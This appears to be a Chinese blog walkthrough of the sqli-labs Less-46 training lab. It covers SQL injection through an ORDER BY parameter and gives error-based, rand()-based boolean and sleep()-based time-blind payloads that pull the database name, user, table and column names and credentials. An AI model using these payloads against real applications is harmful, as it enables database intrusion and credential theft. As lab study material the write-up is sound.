通过盲注脚本复习sqllabs第46关 order by 注入

Less-46

从本关开始,我们开始学习 order by 相关注入的知识。本关的 sql 语句为$sql ="SELECT * FROM users ORDER BY $id";尝试?sort=1 desc或者 asc,显示结果不同,则表明可以注入。(升序 or 降序排列)从上述的 sql 语句中我们可以看出,我们的注入点在 order by后面的参数中,而 order by不同于的我们在 where 后的注入点,不能使用 union 等进行注入。如何进行 order by的注入,我们先来了解一下 。

打开46关

我们可利用 order by 后的一些参数进行注入。

首先(1)、order by 后的数字可以作为一个注入点。也就是构造 order by 后的一个语句,让该语句执行结果为一个数,我们尝试http://127.0.0.1/sqli-labs/Less-46/?sort=right(version(),1)没有报错,但是 right 换成 left 都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,

1.直接添加注入语句,?sort=(select ******)

2.利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

Ps:此处我们可以展示一下 rand(ture)和 rand(false)的结果是不一样的。

3.利用 and,例如?sort=1 and(加 sql 语句)。

同时,sql语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。


报错注入

?sort=(select%20count(*)%20from%20information_schema.co
lumns%20group%20by%20concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand()*2)))


上述例子,可以看到 root@localhost 的用户名

select * from 表名 order by 列名(或者数字) asc;升序(默认升序) 
select * from 表名 order by 列名(或者数字) desc;降序


?sort=rand(ascii(left(database(),1))=115)


接下来我们用 rand() 进行演示一下,因为上面提到 rand(true) 和 rand(false) 结果是不一样的。

?sort=rand(ascii(left(database(),1))=116)


从上述两个图的结果,对比 rand(ture) 和 rand(false) 的结果,可以看出报错注入是成功的。
( 2 ) procedure analyse 参数后注入 利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,我们在实际应用中,往往也可能会存在 limit 后的注入,可以利用 procedure analyse 进行注入。

?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)

通过暴库

?sort=(extractvalue(1,concat(0x7e,(select database()),0x7e)))#


时间注入

?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)
相关推荐
Sunyanhui15 小时前
牛客网 SQL36查找后排序
数据库·sql·mysql
Mitch3117 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King7 小时前
网络安全 - SQL Injection
sql·web安全·php
Stanford_11069 小时前
高级的SQL查询技巧有哪些?
sql·微信小程序·twitter·微信开放平台
wlyang66612 小时前
1. SQL常见笔试题目
数据库·sql
smilejingwei12 小时前
SQL,生成指定时间间隔内的事件次序号
数据库·sql·spl·esprocspl
张伯毅14 小时前
Flink SQL 支持 kafka 开启 kerberos 权限控制.
sql·flink·kafka
向阳121814 小时前
mybatis 动态 SQL
数据库·sql·mybatis
小黄人软件14 小时前
20241220流水的日报 mysql的between可以用于字符串 sql 所有老日期的,保留最新日期
数据库·sql·mysql
青莳吖14 小时前
Java通过Map实现与SQL中的group by相同的逻辑
java·开发语言·sql